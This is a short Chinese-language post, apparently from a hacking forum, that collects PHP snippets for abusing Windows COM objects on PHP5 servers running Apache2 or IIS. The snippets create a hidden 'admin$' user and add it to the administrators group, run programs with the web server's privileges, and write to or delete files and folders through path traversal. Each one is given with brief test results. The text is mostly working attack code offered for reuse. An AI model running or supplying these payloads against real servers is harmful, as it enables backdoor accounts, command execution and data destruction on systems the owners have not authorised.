問題存在於php5,windows平台,通用apache2和iis
添加用戶
<?php
$wscript = new COM('wscript.shell'); $wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>
測試結果為添加了受限的用戶,並沒有加入管理員組
通過http 服務軟件運行程序。
<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
$compatUI->RunApplication("something", "notepad.exe", 1);
?>
測試結果為進程繼承了http服務軟件的權限。
以服務為運行方式的http服務軟件運行的進程是不可視的,但如果用zend studio來運行的話就可以看見了。
其他代碼沒有一一測試,現將黑防雜志附送光盤裡的代碼貼上來。
RunApplication函數測試代碼
<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
$compatUI->RunApplication("something", "notepad.exe", 1);
?>
Wscript運行命令測試代碼
<?php
$wscript = new COM('wscript.shell');
$wscript->Run("cmd.exe /c calc.exe");
?>
<?php
$wscript = new COM('wscript.shell'); $wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>
OpenTextFile測試代碼
<?php
$mPath = str_repeat("..\",20);
$FSO = new COM('Scripting.FileSystemObject');
$FSO->OpenTextFile($mPath."bat.bat", 8, true);
?>
DeleteFile測試代碼
<?php
$mPath = str_repeat("..\",20);
$FSOdelFile = new COM('Scripting.FileSystemObject');
$FSOdelFile->DeleteFile($mPath.".\*.dat", True);
?>
DeleteFolder測試代碼
<?php
$mPath = str_repeat("..\",20);
$FSOdelFolder = new COM('Scripting.FileSystemObject');
$FSOdelFolder->DeleteFolder($mPath.".\11", True);
?>
Create函數測試代碼
<?php
$user = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');
$user->Create("asd");
?>